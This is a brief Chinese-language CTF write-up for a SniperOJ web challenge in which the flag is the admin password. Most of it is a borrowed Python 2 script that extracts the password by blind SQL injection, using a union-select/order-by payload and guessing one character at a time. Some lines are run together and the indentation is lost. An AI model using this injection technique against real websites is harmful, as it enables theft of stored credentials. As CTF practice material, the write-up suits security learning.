`http://web2.sniperoj.cn:10004/?username&password`
得到信息:Flag is the password of admin!
所以接下来的思路应该是拿admin的password,肯定是注入了
然后根据题目观察来看,应该是一道盲注题,但是我尝试了一些姿势,但是不太懂为何我的payload不能照我预期进行,我也进行了本地测试,但是本地是成功的……所以很郁闷,所以引用了网上别的的脚本:
#!/usr/bin/python
# coding:utf-8import requests
def makeStr(begin,end):
str=""
for i in range(begin,end):
str+=chr(i)
return str
def getPassword():
url="http://web2.sniperoj.cn:10004/index.php?username="
testStr = makeStr(48,127)
#print testStr
username = "admin' union distinct select 1,2,0x{hex} order by 3 desc%23&password=1"
flag = ""
for _ in range(32):
for i in testStr:
data = username.format(hex=(flag+i).encode('hex'))
#print data
res = requests.post(url+data)
if "admin" not in res.text:
flag= flag+chr(ord(i)-1)
print flag breakif __name__== '__main__':
getPassword()